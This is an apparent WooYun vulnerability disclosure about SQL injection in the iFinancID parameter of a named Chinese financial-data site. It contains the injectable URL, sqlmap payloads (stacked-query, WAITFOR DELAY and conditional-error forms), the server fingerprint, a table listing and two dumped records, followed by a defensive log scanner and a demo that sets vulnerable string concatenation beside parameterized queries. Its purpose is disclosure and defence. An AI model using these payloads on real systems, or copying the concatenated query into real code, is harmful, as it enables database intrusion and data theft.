
Vulnerability summary

Defect ID: wooyun-2015-0157618

Title: SQL injection vulnerability on 金牛理财网 (jnlc.com)

Vendor: 中证金牛(北京)投资咨询有限公司

Author: 路人甲

Submitted: 2015-12-02 14:12

Fix deadline: 2016-01-16 14:14

Published: 2016-01-16 14:14

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-12-02: Actively contacting the vendor and waiting for the vendor to claim the report; details not publicly disclosed
2016-01-16: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

All data on 金牛理财网 (jnlc.com) is exposed.

Detailed description:

The iFinancID parameter of http://bankdata.jnlc.com/SitePages/productinfo.aspx is injectable. The back end is Microsoft SQL Server 2008 behind ASP.NET on IIS 7.5, and stacked queries are accepted, so the injection is not limited to reading: sqlmap confirmed stacked, time-based blind and conditional-error blind techniques. Every database on the server (six in total, including the site's own YHLC product database with about 290,000 bank wealth-management product records) is readable, which is what "all data exposed" above refers to.

Proof of vulnerability:

Injection point (sqlmap output follows):
http://bankdata.jnlc.com/SitePages/productinfo.aspx?iFinancID=303346&iBankID=400057&lcqx=1-3%E6%9C%88
---
Place: GET
Parameter: iFinancID
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: iFinancID=303346'; IF(5751=5751) SELECT 5751 ELSE DROP FUNCTION QpAm--&iBankID=400057&lcqx=1-3%E6%9C%88

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: iFinancID=303346'; WAITFOR DELAY '0:0:5'--&iBankID=400057&lcqx=1-3%E6%9C%88

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: iFinancID=303346' WAITFOR DELAY '0:0:5'--&iBankID=400057&lcqx=1-3%E6%9C%88
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [6]:
[*] finchina
[*] master
[*] model
[*] msdb
[*] tempdb
[*] YHLC
Database: YHLC
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.tbBankFinacle | 290717 |
| dbo.v_BankFinacle | 290717 |
| dbo.v_BankFinacleSingleInf | 290717 |
| dbo.v_GetBankFinacleAllProducts | 290716 |
| dbo.v_GetBankFinacleByBankLCQX | 290716 |
| dbo.v_GetWeekAVGSyl_ByBankID | 56391 |
| dbo.v_GetAllLcqxWeekAVGSyl_ByBankID | 26526 |
| dbo.v_GetMonthAVGSyl_ByBankID | 20411 |
| dbo.v_GetQuarterAVGSyl_ByBankID | 8923 |
| dbo.v_GetAllLcqxMonthAVGSyl_ByBankID | 8058 |
| dbo.TradingDays | 5987 |
| dbo.v_GetWeekAVGSyl_ByProfitType | 4720 |
| dbo.v_GetAllLcqxQuarterAVGSyl_ByBankID | 3104 |
| dbo.tbAgencyOrgan | 3068 |
| dbo.tbConfig | 2764 |
| dbo.YHLC_tbjnlcIndex | 2649 |
| dbo.v_GetWeekAVGSyl_AllBanks | 1704 |
| dbo.v_GetMonthAVGSyl_ByProfitType | 1317 |
| dbo.v_GetAllLcqxWeekAVGSyl_ByProfitType | 1113 |
| dbo.v_GetQuarterAVGSyl_ByProfitType | 499 |
| dbo.v_GetMonthAVGSyl_AllBanks | 439 |
| dbo.v_GetAllLcqxWeekAVGSyl_AllBanks | 316 |
| dbo.v_GetAllLcqxMonthAVGSyl_ByProfitType | 270 |
| dbo.v_GetBankFinacleHomepage | 212 |
| dbo.v_GetQuarterAVGSyl_AllBanks | 155 |
| dbo.v_GetAllLcqxQuarterAVGSyl_ByProfitType | 97 |
| dbo.v_GetAllLcqxMonthAVGSyl_AllBanks | 78 |
| dbo.v_GetAllLcqxQuarterAVGSyl_AllBanks | 30 |
| dbo.BankVip | 25 |
| dbo.YHLC_tbAgencyForVip | 22 |
| dbo.YHLC_BankFinacleRateByPeriod | 20 |
| dbo.YHLC_tbAgencyForIndex | 20 |
| dbo.v_GetWeekTotalCirculation_Homepage | 12 |
| dbo.YHLC_BankFinacleRateByPeriodFindProduct_TEMP | 10 |
| dbo.MSreplication_objects | 9 |
| dbo.BankTypeOrder | 7 |
| dbo.MSreplication_subscriptions | 1 |
| dbo.MSsubscription_agents | 1 |
| dbo.MSsubscription_properties | 1 |
+--------------------------------------------------+---------+
Database: YHLC
Table: tbBankFinacle
[2 entries]
+---------+-----------+------------+-------------+--------+--------+-------+----------+-------+-------+--------+---------+---------+----------+----------+----------+----------+----------+--------------------+-----------+------------+------------+--------------------+------------+-----------------------------------------------------------------------+--------------------+------------+-------------+-------------+-------------+-------------+-------------+---------------------------------+--------------+--------------+--------------+--------------+--------------+--------------------+--------------------+----------------------------------------------------------------------+---------------+----------------------------------------+---------------+---------------+---------------+---------------+----------------+------------------+----------------+----------------+----------------+----------------+-----------------+---------------------------------------------------+------------------+------------------+
| iBankID | iFinancID | strFileIDs | iFinancIDCH | dTgfl | dGlfy | dShfl | dBbbl | dFljx | dRgfl | dFdsyl | dCyqsyl | strMemo | strLimit | strYield | iRunDays | dDqnhsyl | strRella | sdtUpdate | strSaleTo | dYqnhsylsx | dMarketBot | sdtSaleEnd | dMarketTop | strFeeExpl | sdtFinaEnd | strCejwglf | sdtUpdateCH | sdtCreateCH | strSeriName | strNameFrom | strFinaType | strFinaName | strMoneyType | mInvestStart | strSaleWhere | strFinaStyle | strReferRate | sdtSaleStart | sdtFinaStart | strFundsExpl | strFinaCodeWD | strFinaNameWD | strFinaCodeCH | strFinaNameCH | strFinaNamePY | strProfitType | sdtFirstUpdate | strFundsInvest | strFinaNameQT2 | strFinaNameQT1 | strEarlierStop | strBankNameSmp | strBusinesStyle | strEarlStopExpl | strBankStopRight | strEarlBackRight |
+---------+-----------+------------+-------------+--------+--------+-------+----------+-------+-------+--------+---------+---------+----------+----------+----------+----------+----------+--------------------+-----------+------------+------------+--------------------+------------+-----------------------------------------------------------------------+--------------------+------------+-------------+-------------+-------------+-------------+-------------+---------------------------------+--------------+--------------+--------------+--------------+--------------+--------------------+--------------------+----------------------------------------------------------------------+---------------+----------------------------------------+---------------+---------------+---------------+---------------+----------------+------------------+----------------+----------------+----------------+----------------+-----------------+---------------------------------------------------+------------------+------------------+
| 600659 | 100 | NULL | NULL | 0.0400 | 0.1500 | NULL | 103.2150 | NULL | NULL | 3.2150 | NULL | NULL | 1月 | NULL | 31 | 3.2150 | NULL | 06 7 2012 2:19PM | VIP | 3.2150 | 0.8000 | 01 9 2011 12:00AM | 0.8000 | 1.年托管费率0.035% 2.年管理费率0.15% 3.投资组合运作年化收益率超过3.40%的部分作为浮动资产投资管理费由上海银行收取. | 02 10 2011 12:00AM | 是 | NULL | NULL | NULL | NULL | 非结构性产品 | 慧财110M101期点滴成金人民币1个月W20110M101B | 人民币 | 50000.00 | 全国 | 单期 | NULL | 01 4 2011 12:00AM | 01 10 2011 12:00AM | 1.委托起始金额(元):50000,委托递增单位(元):10000,单户最高限额9000万元. 2.发行限额:个人VIP客户8000万元 | NULL | 2011年“慧财”110M101期点滴成金人民币1个月W20110M101B | NULL | NULL | NULL | 保证收益型 | NULL | 债券 | NULL | NULL | NULL | 上海银行 | 其他 | 上海银行可单方面全部提前兑付本理财产品; 本理财产品投资者不得提前部分支取或全额赎回,也不可质押. | 是 | 否 |
| 600157 | 1000 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 21天 | NULL | 21 | 3.4500 | NULL | 05 8 2012 5:00PM | 机构 | 3.4500 | NULL | 01 25 2011 12:00AM | NULL | NULL | 02 16 2011 12:00AM | NULL | NULL | NULL | NULL | NULL | 非结构性产品 | 第076期非凡资产管理(增利型)理财产品D21款产品 | 人民币 | 500000.00 | 全国 | 单期 | NULL | 01 20 2011 12:00AM | 01 26 2011 12:00AM | 对公:委托起始金额(元):500000 | NULL | 2011年第076期非凡资产管理(增利型)理财产品D21款产品 | NULL | NULL | NULL | 非保本浮动收益型 | NULL | 债券,信贷资产,利率,其他,票据 | NULL | NULL | NULL | 民生银行 | 其他,信托 | NULL | NULL | NULL |
+---------+-----------+------------+-------------+--------+--------+-------+----------+-------+-------+--------+---------+---------+----------+----------+----------+----------+----------+--------------------+-----------+------------+------------+--------------------+------------+-----------------------------------------------------------------------+--------------------+------------+-------------+-------------+-------------+-------------+-------------+---------------------------------+--------------+--------------+--------------+--------------+--------------+--------------------+--------------------+----------------------------------------------------------------------+---------------+----------------------------------------+---------------+---------------+---------------+---------------+----------------+------------------+----------------+----------------+----------------+----------------+-----------------+---------------------------------------------------+------------------+------------------+
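The three payload shapes sqlmap reported above (a quote followed by a second statement, WAITFOR DELAY, and an IF(...) SELECT ... ELSE conditional) are easy to pick out of IIS access logs after the fact, and time-taken lets a responder tell an attempt from a confirmed execution. The following is an added example, not part of the report and not code from jnlc.com: it parses a constructed IIS W3C log excerpt (the query strings reproduce the payloads listed above; the site's real log format and field selection are an assumption) and flags each request.

```python
import re
from urllib.parse import unquote_plus

# Added example, not code from the report. Constructed IIS W3C log excerpt
# (assumption: the site logs cs-uri-query and time-taken, as IIS 7.5 can); the
# query strings reproduce the three sqlmap payloads listed above, preceded by a
# benign request for contrast. Spaces are %20-encoded as a client would send them.
IIS_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status time-taken
2015-12-02 06:10:01 GET /SitePages/productinfo.aspx iFinancID=303346&iBankID=400057&lcqx=1-3%E6%9C%88 203.0.113.5 200 41
2015-12-02 06:10:03 GET /SitePages/productinfo.aspx iFinancID=303346%27;%20IF(5751=5751)%20SELECT%205751%20ELSE%20DROP%20FUNCTION%20QpAm--&iBankID=400057&lcqx=1-3%E6%9C%88 203.0.113.5 500 38
2015-12-02 06:10:04 GET /SitePages/productinfo.aspx iFinancID=303346%27;%20WAITFOR%20DELAY%20%270:0:5%27--&iBankID=400057&lcqx=1-3%E6%9C%88 203.0.113.5 200 5042
2015-12-02 06:10:10 GET /SitePages/productinfo.aspx iFinancID=303346%27%20WAITFOR%20DELAY%20%270:0:5%27--&iBankID=400057&lcqx=1-3%E6%9C%88 203.0.113.5 200 5031
"""

# Parameters that productinfo.aspx treats as integer identifiers (from the URL above).
NUMERIC_PARAMS = ("iFinancID", "iBankID")

# T-SQL markers for the three techniques sqlmap reported against this endpoint.
RULES = (
    ("time-based blind", re.compile(r"WAITFOR\s+DELAY\s+'(\d+):(\d+):(\d+)'", re.I)),
    ("stacked queries", re.compile(r"'\s*;")),
    ("conditional error", re.compile(r"\bIF\s*\(.+?\)\s*SELECT\b.+?\bELSE\b", re.I | re.S)),
)


def parse_iis(text):
    """Turn a W3C extended log into dicts keyed by the names in the #Fields line."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows


def parse_query(raw):
    """Split a raw query string on '&' only; a ';' inside a payload must not split it."""
    params = {}
    for pair in raw.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def analyse(row):
    """Return a list of findings for one request (empty means nothing suspicious)."""
    raw = row.get("cs-uri-query", "")
    decoded = unquote_plus(raw)
    findings = []
    # Type check first: an identifier that is not a plain integer is wrong regardless
    # of which SQL keywords it carries.
    for name in NUMERIC_PARAMS:
        for value in parse_query(raw).get(name, []):
            if not value.isdigit():
                findings.append(f"non-numeric {name}")
    for label, pattern in RULES:
        match = pattern.search(decoded)
        if not match:
            continue
        findings.append(label)
        if label == "time-based blind":
            # Compare the requested delay with IIS's time-taken (milliseconds): a
            # response at least that slow means the injected statement actually ran.
            hours, minutes, seconds = (int(g) for g in match.groups())
            delay_ms = (hours * 3600 + minutes * 60 + seconds) * 1000
            if int(row.get("time-taken", 0)) >= delay_ms:
                findings.append("delay observed: injection executed")
    return findings


def scan(text):
    """Analyse every request in the log; returns [(time, findings), ...]."""
    return [(row["time"], analyse(row)) for row in parse_iis(text)]


if __name__ == "__main__":
    for when, findings in scan(IIS_LOG):
        print(when, findings or "clean")
```

The type check alone catches all three payloads, because the endpoint only ever expects an integer; the keyword rules add the technique label, and the time-taken comparison separates a probe that was blocked or errored out from one the database actually executed.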

Remediation:

Parameter filtering: validate iFinancID (and iBankID) server-side as plain integers, and pass them to SQL Server as query parameters instead of concatenating them into the SQL string. Filtering on its own is not enough if the value is still spliced into the query text.
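What "parameter filtering" should mean in practice is shown below as an added example, not code from the report or from jnlc.com. The report's payloads (a closing quote, then a second statement) imply that iFinancID is spliced into a quoted string literal; the example places that vulnerable pattern beside a hardened version that validates both identifiers as integers and binds them as parameters. sqlite3 stands in for SQL Server 2008 (an assumption, so that it runs offline), which is why a simple tautology is used instead of the WAITFOR and IF payloads sqlmap used.

```python
import sqlite3

# Added example, not code from the report or from jnlc.com. sqlite3 stands in for
# SQL Server (assumption); the table is a three-column stand-in for YHLC.dbo.tbBankFinacle.

COLUMNS = "iBankID, iFinancID, strFinaName"


class InvalidParameter(ValueError):
    """Raised when a request parameter fails input validation."""


def build_demo_db():
    """In-memory stand-in for tbBankFinacle.

    The first two rows copy identifiers from the dump above; the third is constructed
    so that the report's own request (iFinancID=303346, iBankID=400057) matches a row.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tbBankFinacle (iBankID INTEGER, iFinancID INTEGER, strFinaName TEXT)"
    )
    conn.executemany(
        "INSERT INTO tbBankFinacle VALUES (?, ?, ?)",
        [
            (600659, 100, "慧财110M101期点滴成金人民币1个月W20110M101B"),
            (600157, 1000, "第076期非凡资产管理(增利型)理财产品D21款产品"),
            (400057, 303346, "constructed sample product"),
        ],
    )
    return conn


def lookup_vulnerable(conn, i_financ_id):
    """The pattern the sqlmap findings imply: raw input spliced into a quoted literal."""
    sql = f"SELECT {COLUMNS} FROM tbBankFinacle WHERE iFinancID = '{i_financ_id}'"
    return conn.execute(sql).fetchall()


def validate_int(name, value, lo=1, hi=2**31 - 1):
    """Allow-list check: the parameter must be a plain decimal integer within range."""
    if not isinstance(value, str) or not value.isdigit():
        raise InvalidParameter(f"{name} must be a decimal integer, got {value!r}")
    number = int(value)
    if not lo <= number <= hi:
        raise InvalidParameter(f"{name} out of range: {number}")
    return number


def lookup_bound_unvalidated(conn, i_financ_id):
    """Binding without validation: the payload reaches the database only as data."""
    sql = f"SELECT {COLUMNS} FROM tbBankFinacle WHERE iFinancID = ?"
    return conn.execute(sql, (i_financ_id,)).fetchall()


def lookup_safe(conn, i_financ_id, i_bank_id):
    """Hardened form: validate both identifiers, then bind them as parameters.

    Binding alone already defeats the injection (the value never reaches the SQL
    parser); validation additionally rejects a bad request before any query runs.
    """
    fid = validate_int("iFinancID", i_financ_id)
    bid = validate_int("iBankID", i_bank_id)
    sql = f"SELECT {COLUMNS} FROM tbBankFinacle WHERE iFinancID = ? AND iBankID = ?"
    return conn.execute(sql, (fid, bid)).fetchall()


def is_rejected(conn, i_financ_id, i_bank_id):
    """True if the hardened lookup refuses the input at validation time."""
    try:
        lookup_safe(conn, i_financ_id, i_bank_id)
    except InvalidParameter:
        return True
    return False


if __name__ == "__main__":
    db = build_demo_db()
    tautology = "303346' OR '1'='1"  # simpler than sqlmap's payloads; sqlite3 has no WAITFOR
    print("vulnerable, normal input :", lookup_vulnerable(db, "303346"))
    print("vulnerable, tautology    :", lookup_vulnerable(db, tautology))
    print("bound, tautology         :", lookup_bound_unvalidated(db, tautology))
    print("safe, normal input       :", lookup_safe(db, "303346", "400057"))
    print("safe, tautology rejected :", is_rejected(db, tautology, "400057"))
```

In the ASP.NET application itself the equivalent is SqlCommand with SqlParameter objects (or a stored procedure with typed parameters) after an int.TryParse of the query-string values; the structure is the same, only the driver differs.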

Copyright notice: when reproducing, credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused the report.